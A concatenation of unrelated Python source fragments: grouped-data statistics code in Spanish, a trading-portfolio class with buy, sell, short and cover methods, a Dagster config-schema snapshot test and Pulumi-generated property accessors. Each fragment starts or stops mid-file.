for n in range(len(self.frecuenciaAcumulada)):
try:
freq1 = self.frecuenciaAcumulada[n]
freq2 = self.frecuenciaAcumulada[n+1]
if self.frecuenciaAcumulada[n] < first and first < self.frecuenciaAcumulada[n+1]:
intervalos = [self.frecuenciaAcumulada[n],self.frecuenciaAcumulada[n+1]]
LimInf = self.intervalos[self.frecuenciaAcumulada.index(intervalos[1])][0][0]
Kn = (n*len(self.dataSet)) / 4
quartil = (((Kn - intervalos[0]) / (intervalos[1] - intervalos[0]) * self.A)) + LimInf
quartils[f"{q}"] = quartil
intervalos = []
except: pass
self.quartils = quartils
def caldecils(self):
decils = {}
for q in range(1,11):
first = (q*len(self.dataSet))/10
if first in self.frecuenciaAcumulada:
valor = self.frecuenciaAcumulada.index(first)
quartil = self.intervalos[valor][0]
decils[f"{q}"] = quartil[1] #limite superior
else:
for n in range(len(self.frecuenciaAcumulada)):
try:
freq1 = self.frecuenciaAcumulada[n]
freq2 = self.frecuenciaAcumulada[n+1]
if self.frecuenciaAcumulada[n] < first and first < self.frecuenciaAcumulada[n+1]:
intervalos = [self.frecuenciaAcumulada[n],self.frecuenciaAcumulada[n+1]]
LimInf = self.intervalos[self.frecuenciaAcumulada.index(intervalos[1])][0][0]
Kn = (q*len(self.dataSet)) / 10
quartil = (((Kn - intervalos[0]) / (intervalos[1] - intervalos[0]) * self.A)) + LimInf
decils[f"{q}"] = quartil
intervalos = []
except: pass
print("\n\n")
self.decils = decils
def createTable(self):
Table = pd.DataFrame()
Table["Intervalos"] = [f"{interval[0][0]}-{interval[0][1]}" for interval in self.intervalos]
Table["Marca de Clase"] = self.marcaDeClase
Table["Frecuencia Absoluta"] = [interval[1] for interval in self.intervalos]
Table["Frecuencia Acumulada"] = self.frecuenciaAcumulada
Table["Frecuencia Relativa"] = self.FrecuencieRelativa
Table["Frecuencia Porcentual"] = self.FrecuenciaPorcentual
Table["X * Fi"] = self.XF
Table["(Xi - X)²"] = self.X_X2
Table["(Xi - X)² * f"] = self.X_X2_F
Table= Table.append({
'Intervalos': "Total",
'Marca de Clase' : "-",
'Frecuencia Absoluta' : sum([interval[1] for interval in self.intervalos]) ,
'Frecuencia Relativa' : sum(self.FrecuencieRelativa),
'Frecuencia Porcentual' : sum(self.FrecuenciaPorcentual),
'Frecuencia Acumulada' : "-",
'X * Fi' : sum(self.XF),
'(Xi - X)²' : sum(self.X_X2),
'(Xi - X)² * f' : sum(self.X_X2_F)
} , ignore_index=True)
Table.to_csv('tablaDeFrecuencia.csv')
def calcMedian(self):
x = (len(self.dataSet) % 2)
if len(self.dataSet) % 2 != 0:
n2 = (len(self.dataSet) + 1) / 2
else: n2 = len(self.dataSet) / 2
for n in range(len(self.frecuenciaAcumulada)):
try:
freq1 = self.frecuenciaAcumulada[n]
freq2 = self.frecuenciaAcumulada[n+1]
if self.frecuenciaAcumulada[n] < n2 and n2 < self.frecuenciaAcumulada[n+1]:
intervalos = [self.frecuenciaAcumulada[n],self.frecuenciaAcumulada[n+1]]
LimInf = self.intervalos[self.frecuenciaAcumulada.index(intervalos[1])][0][0]
freqAbsPos = self.frecuenciaAcumulada.index(intervalos[1])
freqAbs = self.intervalos[freqAbsPos][1]
median = LimInf + (((n2 - intervalos[0]) / freqAbs)) * self.A
self.median = median
except: pass
def calcMode(self):
freq = [interval[1] for interval in self.intervalos]
freqValModa = max(freq)
positionModa = freq.index(freqValModa)
limInf = self.intervalos[positionModa][0][0]
try:freqAnterior = freq[positionModa -1]
except: freqAnterior = 0
try: freqPost = freq[positionModa + 1]
except: freqPost = 0
moda = limInf + ( (freqValModa - freqAnterior) / ( (freqValModa - freqAnterior ) + (freqValModa - freqPost) ) )*self.A
self.moda = moda
def createValueCsv(self):
values = pd.DataFrame()
values["Rango (R)"] = [self.R]
values["Amplitud (A)"] = [self.A]
values["Numero de clases (K)"] = [self.K]
values["Varianza (S²)"] = [sum(self.X_X2_F) /len(self.dataSet)]
values["Desviación Estándar"] = [math.sqrt(sum(self.X_X2_F) /len(self.dataSet) )]
values["Coeficiente de variación "] =[math.sqrt(sum(self.X_X2_F) /len(self.dataSet) ) / | |
transaction
quantity:
The transaction quantity of the involved asset
short:
Whether the transaction is short or long (True is short, False
is long)
Returns:
A boolean value indicating the validity of the transaction.
Raises:
ValueError:
When the transaction quantity is below 0. A transaction quantity
is bounded at 0.
ValueError:
When the date of the asset's most recent valuation does not
match the current date of the portfolio.
ValueError:
When trying to perform a transaction with an asset whose market
is currently closed
"""
if not short:
if isinstance(asset, Currency) and asset.is_base:
return False
elif quantity == 0:
return False
if quantity < 0:
raise ValueError(
"Purchase quantity must be or exceed 0, " f"received {quantity}"
)
elif asset.date != self.date:
raise ValueError(
"Unable to complete transaction, "
f"{asset.date=} does not match "
f"{self.date=}. Please ensure portfolio "
"and asset dates are synced"
)
elif (asset.market_open != asset.market_close) and (
asset.date.time() > asset.market_close
or asset.date.time() < asset.market_open
):
raise ValueError(
f"Unable to complete transaction for {asset=} because the "
"market is closed. Market close is "
f"{utils.timestring(asset.market_close)}, time of last "
f"valuation is {utils.timestring(asset.date)}"
)
return True
def buy(self, asset: Asset, quantity: float) -> None:
"""
Buys an asset using this portfolio
Creates a long position in the given asset with a purchase volume
given by 'quantity'.
Parameters:
asset:
The asset in which to create a long position
quantity:
The purchase quantity
Returns:
TODO: Return the created/altered position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity):
return
# Creating the position to be entered into
position = Position(asset, quantity)
if position.value > self.cash:
raise ValueError(
f"Purchasing {quantity} units of " # type: ignore[attr-defined]
f"{asset.name} {asset.type} requires "
f"{Cash(position.value, position.asset.base)}, "
f"but this portfolio only has {self.cash} "
"in reserve"
)
# Updating the position if one already exists
try:
self.positions[position.key] += position
except KeyError:
self.positions[position.key] = position
# Updating the potfolio's cash reserves
self._cash -= Cash.from_position(position)
# Updating the portfolio's history to reflect purchase
self.update_positions()
self.update_history()
def sell(self, asset: Asset, quantity: float) -> None:
"""Sells a long position in this portfolio
Decrements a long position in the given asset by 'quantity'.
Maximum sale quantity is the amount owned by the portfolio.
Parameters:
asset:
The asset of the corresponding decremented position
quantity:
The sale quantity
Returns:
TODO: Return the modified position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity):
return
# Creating the position to be sold
position = Position(asset, quantity)
# Selling the position if the current position is large enough
# to satisfy the sale quantity
try:
current = self.positions[position.key]
if current.quantity >= quantity:
self._cash += Cash.from_position(position)
self.positions[position.key] -= position
else:
raise ValueError(
f"Portfolio has insufficient long " # type: ignore[attr-defined]
f"position in asset {asset.name} "
f"{asset.type} to sell {quantity} "
f"units. Only {current} units "
"available"
)
# We can only sell positions that we own
except KeyError as e:
raise ValueError(
"Portfolio has no long position in asset " # type: ignore[attr-defined]
f"{asset.name} {asset.type}"
) from e
# Updating the portfolio's history to reflect sale
self.update_positions()
self.update_history()
def short(self, asset: Asset, quantity: float) -> None:
"""
Shorts an asset using this portfolio
Creates a short position in the given asset with a short volume given
by 'quantity'.
Parameters:
asset:
The asset in which to create a short position
quantity:
The short sale quantity
Returns:
TODO: Return the created/altered position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity, short=True):
return
# Creating the position to be shorted
position = Position(asset, quantity, short=True)
# Updating the position if one already exists
try:
self.positions[position.key] += position
except KeyError:
self.positions[position.key] = position
# Updating the potfolio's cash reserves
self._cash -= Cash.from_position(position)
# Updating the portfolio's history to reflect short sale
self.update_positions()
self.update_history()
def cover(self, asset: Asset, quantity: float) -> None:
"""Covers a short position in this portfolio
Covers a short position in the given asset with a cover
(purchase) volume given by 'quantity'.
Parameters:
asset:
The asset in which to cover a short position
quantity:
The cover (purchase) quantity
Returns:
TODO: Return the modified position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity, short=True):
return
# Creating the short position to be covered
position = Position(asset, quantity, short=True)
required = -1 * position.value
if required > self._cash:
raise ValueError(
f"Covering {quantity} short sold units of " # type: ignore[attr-defined]
f"{asset.name} {asset.type} requires "
f"${required}, but this portfolio only "
f"has ${self.cash} in reserve"
)
# Covering the position if the current short position is large
# enough to satisfy the quantity to cover
try:
current = self.positions[position.key]
if current.quantity >= quantity:
self.cash += Cash.from_position(position)
self.positions[position.key] -= position
else:
raise ValueError(
"Portfolio has insufficient short " # type: ignore[attr-defined]
f"position in asset {asset.name} "
f"{asset.type} to cover {quantity} "
f"units. Only {current.quantity} units"
" have been sold short"
)
# We can only cover positions that we have shorts in
except KeyError as e:
raise ValueError(
"Portfolio has no short position in " # type: ignore[attr-defined]
f"asset {asset.name} {asset.type}"
)
# Updating the portfolio's history to reflect short cover
self.update_positions()
self.update_history()
def _history(self) -> pd.DataFrame:
"""
A history of this portfolio's positions and value
Returns a datetime indexed pandas dataframe of this portfolio's
positions and total market value. This function is only used
to initialize it
Returns:
Portfolio position/value history
"""
positions = [position.view() for position in self.positions.values()]
return pd.DataFrame(
[[positions, self.value]],
columns=["POSITIONS", "VALUE"],
index=pd.DatetimeIndex([self.date], name="DATE"),
)
def update_history(self) -> None:
"""
updates this portfolio's history
TODO: Should be a private method
"""
positions = [position.view() for position in self.positions.values()]
data = np.array([positions, self.value], dtype="object")
self.history.at[self.date] = data
def reset(self) -> None:
"""Restarts the portfolio's value history"""
self.history = self._history()
def invest(self, n: float) -> None:
"""
Adds cash to this portfolio
Parameters:
n:
The quantity of cash (in the portfolio's base currency) to add
Returns:
TODO: Return the modified cash position
"""
self.cash += n
    def liquidate(self, force: bool = False) -> None:
        """Sells all positions that are not the base currency/cash position"""
        # Graceful path: close every long and short through the normal
        # sell()/cover() machinery so their validation, cash accounting,
        # and history updates all apply.
        if not force:
            # NOTE(review): sell()/cover() mutate self.positions while
            # self.longs/self.shorts are being iterated — confirm that
            # longs/shorts return snapshots (not live views of positions),
            # otherwise this loop may misbehave.
            for pos in self.longs.values():
                self.sell(pos.asset, pos.quantity)
            for pos in self.shorts.values():
                self.cover(pos.asset, pos.quantity)
        else:
            # Forced path: bypass validation and settle every position
            # directly into cash, zeroing the position quantities.
            for pos in self.longs.values():
                # Never liquidate the base-currency cash position itself
                if isinstance(pos.asset, Currency) and pos.asset.is_base:
                    pass
                else:
                    self.cash += Cash.from_position(pos)
                    pos.quantity = 0
            for pos in self.shorts.values():
                self.cash += Cash.from_position(pos)
                pos.quantity = 0
            # Forced path updates the book once at the end (no per-trade
            # sell()/cover() calls to do it)
            self.update_positions()
def get_position(
self,
asset: Asset,
short: bool = False,
positions: Optional[Iterable[Position]] = None,
) -> Optional[Position]:
"""
Gets this portfolio's current position in the given asset
Parameters:
asset:
The asset being searched
short:
Is the position short or long
positions:
The positions to be searched
Returns:
A position in the asset if found, otherwise None
"""
if positions is None:
positions = self.shorts.values() if short else self.longs.values()
result = [pos for pos in positions if pos.asset is asset]
if result:
return result[0]
return None
def get_related_positions(
self,
asset: Asset,
short: bool = False,
positions: Optional[Iterable[Position]] = None,
) -> list[Position]:
"""
Gets this portfolio's current positions in the given asset or related
to the asset
Parameters:
asset:
The asset being searched
short:
Is the position short or long
positions:
The positions to be searched
Returns:
A list of positions that are related to the asset
"""
if positions is None:
positions = self.shorts.values() if short else self.longs.values()
result = [
pos
for pos in positions
if pos.asset is asset or asset in pos.asset.__dict__.values()
]
return result
def covered_call(
self,
call: Call,
quantity: Optional[float] = None,
limit: Optional[float] = None,
) -> int:
"""
Sells calls in the given quantity, but ensures that they are 'covered'
by owning stock equal to the number of shares accounted for by the
contracts in the case of assignment
Parameters:
call:
The call to be sold short
quantity:
The quantity to sell
limit:
| |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['test_basic_dep_fan_out 1'] = '''{
"__class__": "PipelineSnapshot",
"config_schema_snapshot": {
"__class__": "ConfigSchemaSnapshot",
"all_config_snaps_by_key": {
"Any": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": "Any",
"key": "Any",
"kind": {
"__enum__": "ConfigTypeKind.ANY"
},
"scalar_kind": null,
"type_param_keys": null
},
"Array.Shape.41de0e2d7b75524510155d0bdab8723c6feced3b": {
"__class__": "ConfigTypeSnap",
"description": "List of Array.Shape.41de0e2d7b75524510155d0bdab8723c6feced3b",
"enum_values": null,
"fields": null,
"given_name": null,
"key": "Array.Shape.41de0e2d7b75524510155d0bdab8723c6feced3b",
"kind": {
"__enum__": "ConfigTypeKind.ARRAY"
},
"scalar_kind": null,
"type_param_keys": [
"Shape.41de0e2d7b75524510155d0bdab8723c6feced3b"
]
},
"Array.String": {
"__class__": "ConfigTypeSnap",
"description": "List of Array.String",
"enum_values": null,
"fields": null,
"given_name": null,
"key": "Array.String",
"kind": {
"__enum__": "ConfigTypeKind.ARRAY"
},
"scalar_kind": null,
"type_param_keys": [
"String"
]
},
"Bool": {
"__class__": "ConfigTypeSnap",
"description": "",
"enum_values": null,
"fields": null,
"given_name": "Bool",
"key": "Bool",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR"
},
"scalar_kind": {
"__enum__": "ConfigScalarKind.BOOL"
},
"type_param_keys": null
},
"Float": {
"__class__": "ConfigTypeSnap",
"description": "",
"enum_values": null,
"fields": null,
"given_name": "Float",
"key": "Float",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR"
},
"scalar_kind": {
"__enum__": "ConfigScalarKind.FLOAT"
},
"type_param_keys": null
},
"Int": {
"__class__": "ConfigTypeSnap",
"description": "",
"enum_values": null,
"fields": null,
"given_name": "Int",
"key": "Int",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR"
},
"scalar_kind": {
"__enum__": "ConfigScalarKind.INT"
},
"type_param_keys": null
},
"ScalarUnion.Bool-Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.Bool-Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"Bool",
"Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59"
]
},
"ScalarUnion.Float-Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.Float-Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"Float",
"Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3"
]
},
"ScalarUnion.Int-Selector.a9799b971d12ace70a2d8803c883c863417d0725": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.Int-Selector.a9799b971d12ace70a2d8803c883c863417d0725",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"Int",
"Selector.a9799b971d12ace70a2d8803c883c863417d0725"
]
},
"ScalarUnion.String-Selector.e04723c9d9937e3ab21206435b22247cfbe58269": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": null,
"given_name": null,
"key": "ScalarUnion.String-Selector.e04723c9d9937e3ab21206435b22247cfbe58269",
"kind": {
"__enum__": "ConfigTypeKind.SCALAR_UNION"
},
"scalar_kind": null,
"type_param_keys": [
"String",
"Selector.e04723c9d9937e3ab21206435b22247cfbe58269"
]
},
"Selector.0f5471adc2ad814d1c9fd94e2fa73c07217dea47": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "forkserver",
"type_key": "Shape.45a8f1f21db73ecbfa5b4e07b9aedc1835cef1ef"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "spawn",
"type_key": "Shape.da39a3ee5e6b4b0d3255bfef95601890afd80709"
}
],
"given_name": null,
"key": "Selector.0f5471adc2ad814d1c9fd94e2fa73c07217dea47",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.<KEY>": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "disabled",
"type_key": "Shape.da39a3ee5e6b4b0d3255bfef95601890afd80709"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "enabled",
"type_key": "Shape.da39a3ee5e6b4b0d3255bfef95601890afd80709"
}
],
"given_name": null,
"key": "Selector.1bfb167aea90780aa679597800c71bd8c65ed0b2",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.a9799b971d12ace70a2d8803c883c863417d0725": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Int"
}
],
"given_name": null,
"key": "Selector.a9799b971d12ace70a2d8803c883c863417d0725",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Bool"
}
],
"given_name": null,
"key": "Selector.be5d518b39e86a43c5f2eecaf538c1f6c7711b59",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Float"
}
],
"given_name": null,
"key": "Selector.d00a37e3807d37c9f69cc62997c4a5f4a176e5c3",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.e04723c9d9937e3ab21206435b22247cfbe58269": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "String"
}
],
"given_name": null,
"key": "Selector.e04723c9d9937e3ab21206435b22247cfbe58269",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.e52fa3afbe531d9522fae1206f3ae9d248775742": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
}
],
"given_name": null,
"key": "Selector.e52fa3afbe531d9522fae1206f3ae9d248775742",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.f2fe6dfdc60a1947a8f8e7cd377a012b47065bc4": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "json",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "pickle",
"type_key": "<KEY>"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": true,
"name": "value",
"type_key": "Any"
}
],
"given_name": null,
"key": "Selector.f2fe6dfdc60a1947a8f8e7cd377a012b47065bc4",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Selector.fd22b7b986baf6998a8c16e63e78f44dd5e3f78f": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"config\\": {\\"retries\\": {\\"enabled\\": {}}}}",
"description": null,
"is_required": false,
"name": "in_process",
"type_key": "Shape.ca5906d9a0377218b4ee7d940ad55957afa73d1b"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"config\\": {\\"max_concurrent\\": 0, \\"retries\\": {\\"enabled\\": {}}}}",
"description": null,
"is_required": false,
"name": "multiprocess",
"type_key": "Shape.21277960d85eafb5579d7a10d7a715e444c5a1f7"
}
],
"given_name": null,
"key": "Selector.fd22b7b986baf6998a8c16e63e78f44dd5e3f78f",
"kind": {
"__enum__": "ConfigTypeKind.SELECTOR"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.0bb49540f1708dcf5378009c9571eba999502e19": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "io_manager",
"type_key": "<KEY>"
}
],
"given_name": null,
"key": "<KEY>",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.21277960d85eafb5579d7a10d7a715e444c5a1f7": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"max_concurrent\\": 0, \\"retries\\": {\\"enabled\\": {}}}",
"description": null,
"is_required": false,
"name": "config",
"type_key": "<KEY>"
}
],
"given_name": null,
"key": "Shape.21277960d85eafb5579d7a10d7a715e444c5a1f7",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.241ac489ffa5f718db6444bae7849fb86a62e441": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "\\"INFO\\"",
"description": null,
"is_required": false,
"name": "log_level",
"type_key": "String"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "\\"dagster\\"",
"description": null,
"is_required": false,
"name": "name",
"type_key": "String"
}
],
"given_name": null,
"key": "Shape.241ac489ffa5f718db6444bae7849fb86a62e441",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.<KEY>": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"log_level\\": \\"INFO\\", \\"name\\": \\"dagster\\"}",
"description": null,
"is_required": false,
"name": "config",
"type_key": "Shape.241ac489ffa5f718db6444bae7849fb86a62e441"
}
],
"given_name": null,
"key": "Shape.3baab16166bacfaf4705811e64d356112fd733cb",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.41de0e2d7b75524510155d0bdab8723c6feced3b": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": null,
"is_required": false,
"name": "result",
"type_key": "Selector.e52fa3afbe531d9522fae1206f3ae9d248775742"
}
],
"given_name": null,
"key": "Shape.41de0e2d7b75524510155d0bdab8723c6feced3b",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.4277013c8c05368bc2b9a69c9b3d0ba9a592f831": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"field_aliases": {
"solids": "ops"
},
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"in_process\\": {}}",
"description": null,
"is_required": false,
"name": "execution",
"type_key": "Selector.fd22b7b986baf6998a8c16e63e78f44dd5e3f78f"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{}",
"description": null,
"is_required": false,
"name": "loggers",
"type_key": "Shape.ebeaf4550c200fb540f2e1f3f2110debd8c4157c"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"io_manager\\": {}}",
"description": null,
"is_required": false,
"name": "resources",
"type_key": "Shape.0bb49540f1708dcf5378009c9571eba999502e19"
},
{
"__class__": "ConfigFieldSnap",
"default_provided": true,
"default_value_as_json_str": "{\\"passone\\": {}, \\"passtwo\\": {}, \\"return_one\\": {}}",
"description": null,
"is_required": false,
"name": "solids",
"type_key": "Shape.efd6e48220d7eb65a0b9e8814dd15fa00be63496"
}
],
"given_name": null,
"key": "<KEY>",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.45a8f1f21db73ecbfa5b4e07b9aedc1835cef1ef": {
"__class__": "ConfigTypeSnap",
"description": null,
"enum_values": null,
"fields": [
{
"__class__": "ConfigFieldSnap",
"default_provided": false,
"default_value_as_json_str": null,
"description": "Explicit modules to preload in the forkserver.",
"is_required": false,
"name": "preload_modules",
"type_key": "Array.String"
}
],
"given_name": null,
"key": "Shape.45a8f1f21db73ecbfa5b4e07b9aedc1835cef1ef",
"kind": {
"__enum__": "ConfigTypeKind.STRICT_SHAPE"
},
"scalar_kind": null,
"type_param_keys": null
},
"Shape.4b53b73df342381d0d05c5f36183dc99cb9676e2": {
"__class__": "ConfigTypeSnap",
"description": null,
| |
"issuer")
    # Auto-generated pulumi property accessors: each getter/setter pair
    # proxies a single field of this input type via pulumi.get/pulumi.set.
    @issuer.setter
    def issuer(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "issuer", value)
    @property
    @pulumi.getter(name="openIdConnectDiscoveryDocument")
    def open_id_connect_discovery_document(self) -> Optional[pulumi.Input[str]]:
        """
        The OpenID connect discovery document.
        """
        return pulumi.get(self, "open_id_connect_discovery_document")
    @open_id_connect_discovery_document.setter
    def open_id_connect_discovery_document(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "open_id_connect_discovery_document", value)
    @property
    @pulumi.getter(name="primaryRsaTokenKeyExponent")
    def primary_rsa_token_key_exponent(self) -> Optional[pulumi.Input[str]]:
        """
        The RSA Parameter exponent.
        """
        return pulumi.get(self, "primary_rsa_token_key_exponent")
    @primary_rsa_token_key_exponent.setter
    def primary_rsa_token_key_exponent(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "primary_rsa_token_key_exponent", value)
    @property
    @pulumi.getter(name="primaryRsaTokenKeyModulus")
    def primary_rsa_token_key_modulus(self) -> Optional[pulumi.Input[str]]:
        """
        The RSA Parameter modulus.
        """
        return pulumi.get(self, "primary_rsa_token_key_modulus")
    @primary_rsa_token_key_modulus.setter
    def primary_rsa_token_key_modulus(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "primary_rsa_token_key_modulus", value)
    @property
    @pulumi.getter(name="primarySymmetricTokenKey")
    def primary_symmetric_token_key(self) -> Optional[pulumi.Input[str]]:
        """
        The key value of the key. Specifies a symmetric key for token validation.
        """
        return pulumi.get(self, "primary_symmetric_token_key")
    @primary_symmetric_token_key.setter
    def primary_symmetric_token_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "primary_symmetric_token_key", value)
    @property
    @pulumi.getter(name="primaryX509TokenKeyRaw")
    def primary_x509_token_key_raw(self) -> Optional[pulumi.Input[str]]:
        """
